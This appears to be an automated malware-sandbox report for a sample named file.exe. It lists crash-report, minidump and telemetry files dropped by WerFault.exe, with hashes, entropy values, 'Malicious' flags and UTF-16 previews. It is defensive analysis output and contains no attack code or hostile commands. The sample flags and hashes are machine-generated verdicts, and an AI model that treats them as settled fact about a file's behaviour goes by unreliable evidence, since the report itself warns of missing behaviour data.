• Report size exceeded maximum capacity and may have missing behavior information
• Report size getting too big, too many NtAllocateVirtualMemory calls found
• Report size getting too big, too many NtOpenKeyEx calls found
• Report size getting too big, too many NtProtectVirtualMemory calls found
• Report size getting too big, too many NtQueryValueKey calls found
Time     | Type            | Description
17:30:22 | API Interceptor | 1x Sleep call for process: file.exe modified
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 0.8413921404242342
Encrypted: false
SSDEEP: 192:0+G1Vfav7FH56rrE3jDB/u7swS274It1hBx:a2x56rwjl/u7swX4ItN
MD5: AE8AE64294D6FA52CF25B72CCFA9B424
SHA1: 67CFC19720494D42E2FE8A0CDABD5474ACACC806
SHA-256: E4029CF442A03D5230EE45AB951E41873E62F55561C138A958C2E78141247714
SHA-512: EE9FF764AE2408CAD8E2CBB2D5A5985D314D7BBDD70F1F55C878C31036775EC9D7A4DB5BAC50D6C4C892BE313B0AEF5B656912BC6288C94E240762F2CC20550B
Malicious: true
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 0.8646212963389045
Encrypted: false
SSDEEP: 192:QkG1VfavFFH56rrE3jDm/u7swS274It1hBx:C2P56rwjC/u7swX4ItN
MD5: F06265723A39C280E464EA71CB2340B2
SHA1: 9EF034D5F7C208671F5F02DA0BDFBCF80B7B2450
SHA-256: 5FD7EB50B113154EC744B2F5E5B4679A5837B3198F3235B96EC6B53C453586F5
SHA-512: CE44A524F15E5EFD1F34DE70A1FEFF24FB6352F2F5139C088E023E770E80C811BAEDF05DF7E38C5AFE9DA542161DB9FC8792C9872F915A8D42EAF34B0C16B4B7
Malicious: true
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 0.8276699661029949
Encrypted: false
SSDEEP: 192:tG1VfavUFH56rrE3jDk/u7swS274It1hBx:W2c56rwjg/u7swX4ItN
MD5: 8E6DF1FEDD2DCDFEEAD81E751F1E9E30
SHA1: A28E1D741B8018EAC8302C3631FBD1FB1A1B5C74
SHA-256: 5B387D32E08D4D09C09360B6713B6F2BDC20C4C801BF05A9FA7B335D40AE770F
SHA-512: CB26D8837B531A206CD37DF93526F11027C8E5A840C05079D77A81F1463987454A4F125BEB6670629697FEA539AE4B0B1614D423056DE0DBAA80A51B0A339F26
Malicious: true
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 0.8645912092877456
Encrypted: false
SSDEEP: 192:OG1VfavMFH56rrE3jDm/u7swS274It1hBx:V2E56rwjC/u7swX4ItN
MD5: BFE67807DC0602F55378507755440CEE
SHA1: B3EB70858BDCE565941C6E0F060FC884B3ADEF6D
SHA-256: 653586F31427F3303B54C7BDAE8B0671116DC96D1442414B4F322B8DE2FBC17B
SHA-512: E9DE1C42FEBFF12DCBE0CD19AAC56582A97B5E165F266FA099D3C6B6D0F453BBC6177D6581553CD1CE7F309520844187934AD4D4CA2470B755E5D4549D64788B
Malicious: true
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 0.9178695391219902
Encrypted: false
SSDEEP: 192:+ZG1Vfav7FH56rrE3jDy8/u7swS274It1hBx:+62x56rwjD/u7swX4ItN
MD5: CA143ECEC56682C4667E60F8CC68A65F
SHA1: AAAF4F27FCAB944C8AF953F479475148857C665F
SHA-256: 31D5C72900C85B7EE64B1D9E0125812EBD969D2FA3E3EF8744A43412E39B2314
SHA-512: 3456367071CBD45B03310FECF31C50F732E4C3EB6A66963F09BE3CD8E8F9B8ED896F76A1B797C3AC695C40768AD45F626B2EB4B63F73DD9C0EDFD627A3C5C559
Malicious: true
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 0.8419314888891837
Encrypted: false
SSDEEP: 192:86bG1VfavFFH56rrE3jDB/u7swS274It1hBx:8682P56rwjl/u7swX4ItN
MD5: 5F781DC311C9F39A8DF1C3D0EB4D85B2
SHA1: 5660436EBC6CA12BA0081C30895423D4495E6DB1
SHA-256: E958CD79B8663CD546443A8FB101F4932E1B78A6D9BE0AAEE8DA6D1A7BD102F4
SHA-512: 034BABD2EE208DDA30EC06F53707A3B6386859E9F45B40AAE66AAD3B10AAEC71F11797EF991C3B17C61228FD368C30046EE30E5AA1A29E536DE961EFA7AD26A9
Malicious: true
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.8419290418748682
                                                      Encrypted:false
                                                      SSDEEP:192:3G1Vfav7FH56rrE3jDB/u7swS274It1hBx:g2x56rwjl/u7swX4ItN
                                                      MD5:05C5565B84AF00791301D3D05D4A5A7C
                                                      SHA1:E3071FBA62D46995DB3DE686D83F6B25B8313922
                                                      SHA-256:7824D8794AE43997AD79EC7AECD2B15D4DE6C75ABF430143470CADD47A7ABEDD
                                                      SHA-512:DD7B7D2B0EC0DFF20B0E47A404E75A5DAB161A6C2117583D5F58174D4830B976E0D10FED9F9FA1B4032D24F888F8A274858EB80017F3F5600EFCBB1E6C2334FE
                                                      Malicious:true
                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.9.3.1.6.9.7.7.0.8.6.8.9.8.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.8.b.c.9.6.5.4.-.b.4.7.0.-.4.9.3.4.-.9.3.1.7.-.a.6.c.3.3.3.5.b.7.9.2.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.c.d.9.7.b.e.a.-.0.a.8.e.-.4.0.4.2.-.9.e.3.e.-.6.9.5.5.6.4.f.0.f.4.f.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.c.7.c.-.0.0.0.1.-.0.0.1.9.-.a.5.7.9.-.e.c.5.c.8.8.d.7.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.6.5.3.d.e.e.c.5.b.c.5.a.9.c.c.9.7.3.9.f.2.5.f.4.c.2.c.d.7.5.a.0.0.0.0.f.f.f.f.!.0.0.0.0.e.b.b.b.0.c.3.5.8.6.b.8.a.0.2.4.4.5.8.5.e.a.c.b.4.4.c.a.1.2.5.a.c.9.3.3.a.d.8.e.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.0.9././.1.9.:.1.5.:.0.2.:.4.3.!.0.!.f.i.l.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.e.S.p.l.i.t.
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.8844034957297929
                                                      Encrypted:false
                                                      SSDEEP:192:QfG1VfavBFH56rrE3jDyG/u7swS274It1hBx:QI2D56rwjJ/u7swX4ItN
                                                      MD5:D56429A7633BE3262EEE75F7265F8DDF
                                                      SHA1:F04A49AFC5F084360D2A08CEDF09AAAB69AFC029
                                                      SHA-256:3556DD34019427E27224730C2127784CA6CB63422B8CA11562C20DC3483D07D8
                                                      SHA-512:17FDE668172122D084BBE84BB0A49A43BB742371B313009CB2175CE8964B00DE64DF00AE5A804CB58A01DF5E4A0CBC24435F7787EA0C9BDD3CAEA7E04BF70EED
                                                      Malicious:true
                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.9.3.1.6.9.9.5.3.2.4.2.9.2.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.9.4.3.2.3.b.e.-.0.6.7.7.-.4.3.0.e.-.b.3.a.1.-.1.5.9.e.5.9.b.4.6.3.f.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.1.8.7.4.3.c.9.-.3.7.3.4.-.4.d.8.6.-.a.5.5.7.-.7.9.a.7.b.3.8.8.9.9.b.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.c.7.c.-.0.0.0.1.-.0.0.1.9.-.a.5.7.9.-.e.c.5.c.8.8.d.7.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.6.5.3.d.e.e.c.5.b.c.5.a.9.c.c.9.7.3.9.f.2.5.f.4.c.2.c.d.7.5.a.0.0.0.0.f.f.f.f.!.0.0.0.0.e.b.b.b.0.c.3.5.8.6.b.8.a.0.2.4.4.5.8.5.e.a.c.b.4.4.c.a.1.2.5.a.c.9.3.3.a.d.8.e.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.0.9././.1.9.:.1.5.:.0.2.:.4.3.!.0.!.f.i.l.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.e.S.p.l.i.t.
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.8413309258427019
                                                      Encrypted:false
                                                      SSDEEP:192:mG1VfavIFH56rrE3jDB/u7swS274It1hBx:t2456rwjl/u7swX4ItN
                                                      MD5:0AB96516285C4951270041601DA48B24
                                                      SHA1:E6EB4AA60BD3ADECB8D821ED8A85ABEBFDB828BE
                                                      SHA-256:4CCF61E5ED702AAA4C42AF5011EAC0434377D6817405B16836A2BD16D1B75A0F
                                                      SHA-512:B960BD998AE897E33B9BABEC19FD6412CFD5F1BDFDB92C1FEB6FA9C5A9A1BE5E09C150675E9A534480173A4C3DC0A03CCD247FDD631515B169EBE7FD22A5C9BB
                                                      Malicious:true
                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.9.3.1.6.9.7.9.6.4.5.7.8.9.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.6.4.d.7.3.c.0.-.2.a.6.f.-.4.9.c.c.-.9.d.9.3.-.8.9.0.3.2.5.f.b.a.0.0.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.8.0.0.0.2.c.d.-.d.c.1.5.-.4.9.d.7.-.a.1.d.4.-.8.8.0.e.3.0.0.d.5.f.7.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.c.7.c.-.0.0.0.1.-.0.0.1.9.-.a.5.7.9.-.e.c.5.c.8.8.d.7.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.6.5.3.d.e.e.c.5.b.c.5.a.9.c.c.9.7.3.9.f.2.5.f.4.c.2.c.d.7.5.a.0.0.0.0.f.f.f.f.!.0.0.0.0.e.b.b.b.0.c.3.5.8.6.b.8.a.0.2.4.4.5.8.5.e.a.c.b.4.4.c.a.1.2.5.a.c.9.3.3.a.d.8.e.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.0.9././.1.9.:.1.5.:.0.2.:.4.3.!.0.!.f.i.l.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.e.S.p.l.i.t.
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.9867845917103395
                                                      Encrypted:false
                                                      SSDEEP:192:3NG1VfavF8Hox3uSE3jDyL+/u7sLS274It1hBx:322uox3uFjd/u7sLX4ItN
                                                      MD5:FFE341DAFC29395559DE290B63B67E17
                                                      SHA1:EF54570106945D489099041CB737B2FE57BD730E
                                                      SHA-256:530C1F7B56B02455CE3F3C289710665848468A91A1005229DFB49C10E88FB0DC
                                                      SHA-512:487D6BDA9EB61D59CE06368C8DFA859612F58214CFFAE8495532D37A662DB1D1F36EDD5D1C866E80C721C6E59171F716E1820176D1BFADC95493B009009CD19D
                                                      Malicious:true
                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.9.3.1.7.0.5.1.4.5.7.8.7.3.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.d.2.2.8.5.4.e.-.4.9.3.a.-.4.5.6.9.-.b.6.f.a.-.4.8.6.c.5.9.d.5.6.d.8.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.c.1.1.1.6.4.e.-.3.5.b.f.-.4.e.2.c.-.a.9.e.f.-.6.5.f.8.3.c.6.a.e.1.3.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.c.7.c.-.0.0.0.1.-.0.0.1.9.-.a.5.7.9.-.e.c.5.c.8.8.d.7.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.6.5.3.d.e.e.c.5.b.c.5.a.9.c.c.9.7.3.9.f.2.5.f.4.c.2.c.d.7.5.a.0.0.0.0.f.f.f.f.!.0.0.0.0.e.b.b.b.0.c.3.5.8.6.b.8.a.0.2.4.4.5.8.5.e.a.c.b.4.4.c.a.1.2.5.a.c.9.3.3.a.d.8.e.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.0.9././.1.9.:.1.5.:.0.2.:.4.3.!.0.!.f.i.l.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.e.S.p.l.i.t.
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Mini DuMP crash report, 14 streams, Tue Oct 4 00:30:19 2022, 0x1205a4 type
                                                      Category:dropped
                                                      Size (bytes):117066
                                                      Entropy (8bit):2.1634369641325306
                                                      Encrypted:false
                                                      SSDEEP:768:gjTPXz8b284K1UZYDPz90272rZROEsmvP5tK+T8:6z8jH+ZYrz976tRvsmvP5tKm8
                                                      MD5:7E07887FA1DE8C32864D20247C47BE8C
                                                      SHA1:FE26C4AEDD264ECCF4F38ACD9B57908CC252D22F
                                                      SHA-256:C11448C73BE0D8A7CD04F5A196C6DC1CE77E582AAC7C041AB95B58CD63E1040E
                                                      SHA-512:56F41346895F54BD0436EE8E534BE799A6E2AD0F437AAD2E7CBEB6C099830E06894527511F7A0BE44C3D3E85418684FEF6E642450CF70BC3F328F1A34A1F1F1A
                                                      Malicious:false
                                                      Preview:MDMP....... ........~;c............D...............L.......D...rI..........T.......8...........T............2..............$................................................................................U...........B..............GenuineIntelW...........T.......|...h~;c.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):8408
                                                      Entropy (8bit):3.6938148571549747
                                                      Encrypted:false
                                                      SSDEEP:192:Rrl7r3GLNi/CQ6I7Des6YBSPSUqgmf6TS4CpBA89bMysfFEm:RrlsNil6Id6YBaSUqgmf+SfMxfz
                                                      MD5:A3BF00D56CDD8B5E244BD9227956D3A5
                                                      SHA1:B25A8B1E6FB03E728AB65E92E8008EAF0893434A
                                                      SHA-256:9CE885F16F62BFE12B3445ADB58B8889716C8EFD41A9181EB3DC81C4A63AF116
                                                      SHA-512:1938907D972BE3940B2F002E21BC1644D3F943FE382C4FB7CA96EBB4BFEED83355C8FAF7642EA147DC48E518ACDC599DE7959B33A8398FD13E7D36A286FBCFBA
                                                      Malicious:false
                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.1.9.6.<./.P.i.d.>.......
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):4674
                                                      Entropy (8bit):4.456695882315008
                                                      Encrypted:false
                                                      SSDEEP:48:cvIwSD8zs/JgtWI9cSWgc8sqYjB8fm8M4JblMFj+q8vclCr8MjTzd:uITfh/zgrsqYKJpiKoCr8MXzd
                                                      MD5:E083462977CAE3329F38BB072D383D7F
                                                      SHA1:E32718198891FDCE4647C35D9406DA527364A8CC
                                                      SHA-256:E17740EEF7610651F435C91DCDA479574B2CB61D4E5106E45258DF360BF73ECE
                                                      SHA-512:AC3BCCE2ABE87A8936EA55197A51529DCA752E856FA2AEA3108003B53A5406B99DAA272C6FFBEEA7C1D5261914DC88E778C7158E1274AEBC03DF051764EE6DBF
                                                      Malicious:false
                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1719940" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Mini DuMP crash report, 14 streams, Tue Oct 4 00:29:32 2022, 0x1205a4 type
                                                      Category:dropped
                                                      Size (bytes):50922
                                                      Entropy (8bit):2.2720533470558357
                                                      Encrypted:false
                                                      SSDEEP:192:VRMNjxGyBCRvQQtOPocbIO6INLc2M7gGntUScAN+axFiG/CBZHPLl4zJBIfiY4+4:QgvQHPThPiRtUSLNT4jHPGzJZsq
                                                      MD5:61A0F85CE06F10187FE81E1E3722C09F
                                                      SHA1:BDA6E5FEC2461BCFA6BF6D58E272FB30EA067743
                                                      SHA-256:A2050B0CADFE8E48D647F052DC29F0E7399882461AEEFD2B8841BFE3F46BEE48
                                                      SHA-512:0E149D8C6874D9E6C0C6689FB0CCACC92E711E58EF7B8EE17ED690E2103DF3F1F6B4419802F4A0409FE806C98DA2F2CB1D5BDC474934BABF3955DF1F82C99DE1
                                                      Malicious:false
                                                      Preview:MDMP....... .......l~;c........................\................*..........T.......8...........T...........(..............(................................................................................U...........B..............GenuineIntelW...........T.......|...h~;c.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):8372
                                                      Entropy (8bit):3.695359762107911
                                                      Encrypted:false
                                                      SSDEEP:192:Rrl7r3GLNi/CXb6qS6YBSQSUyPGgmf6TS4CpBo89b2ysfrSm:RrlsNiCb6qS6YBVSUTgmf+SX2xff
                                                      MD5:EDCA1CF7264B6E25B96F15C28189254B
                                                      SHA1:F6A0D3CF9219BF8337041BB71734E02601B65E35
                                                      SHA-256:ED72609E9F6CE727AEEC2E593C2C58EF4982708A76CDD85DEE121568E0F5DC37
                                                      SHA-512:8AC362C9E6C526BB4B24A22DB25DC8F1B10201BA0C74D60A8C18ACA634CC669C9ADE5A236E88C45B48F6CA12CD710DECE2D011F9BB72C95FF2013BEA62EC0034
                                                      Malicious:false
                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.1.9.6.<./.P.i.d.>.......
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):4674
                                                      Entropy (8bit):4.458550279556071
                                                      Encrypted:false
                                                      SSDEEP:48:cvIwSD8zs/JgtWI9cSWgc8sqYjTM8fm8M4JblMFXSh+q8vclCr8MjTzd:uITfh/zgrsqYvxJpZhKoCr8MXzd
                                                      MD5:70C6BD3D3F5F1A5800D46FD98C5EF8D9
                                                      SHA1:768B08637D8A8317D38FF35669C8D179837C46B9
                                                      SHA-256:B4B793BFBDF1D5C3FCCA9D0675AA723C1F58A74AB1EA70B50A33957E48054C14
                                                      SHA-512:1773CA25F27CAF8313CE6A5AEB80687495FA345232D134F3BC36F645921226FE0C0FB6C403C719D90CAA2D5F8D9315A7F11EFCAD7F3F73BB8D6D8C3C01196BEE
                                                      Malicious:false
                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1719940" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Mini DuMP crash report, 14 streams, Tue Oct 4 00:29:35 2022, 0x1205a4 type
                                                      Category:dropped
                                                      Size (bytes):63998
                                                      Entropy (8bit):2.33484711100618
                                                      Encrypted:false
                                                      SSDEEP:192:uEAP/xVcp7udtOPoBBxpziMG0OjI2ib7r0bAwQW1qAzjcAN+8xFiG/kBZHbLnSz/:LP7JPQjdbNp00hWEkLNpOjHb+zGqOKb
                                                      MD5:612D9666FD801BD0D916FEEC94DA1B64
                                                      SHA1:08F79F39C9E09F312B3202646F18C9BCE4E83A8A
                                                      SHA-256:CA385B05F277DB101C2B3195E6D083AC0437B17F27BD4C44FBE5AE69F59038C1
                                                      SHA-512:959C1D9FA247F17DADEEC5A50B436428A3E4F05A3B4A61142712A6A1A986B4E62C3484A51073195E8414DB8D020C3D1CF8B5F4D5C97C4A145E971111E1F82BC0
                                                      Malicious:false
                                                      Preview:MDMP....... .......o~;c........................4...........4...............T.......8...........T...........................0................................................................................U...........B..............GenuineIntelW...........T.......|...h~;c.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):8388
                                                      Entropy (8bit):3.697825310691746
                                                      Encrypted:false
                                                      SSDEEP:192:Rrl7r3GLNi/Cm6LY6YBSnSUZ8Jgmf6TS4CpBHz89bgysfBgm:RrlsNiL6U6YBySUZ8Jgmf+SmgxfT
                                                      MD5:03D4FEC4D29C9C3F4CB6BBA26B9C092C
                                                      SHA1:7BE64D5014504BF94CCCA5F777E8E89F7AE305C1
                                                      SHA-256:8C11A08D49C075607E2AC630973DBFA24222953F7B27E2808343D8BC9BE16CEB
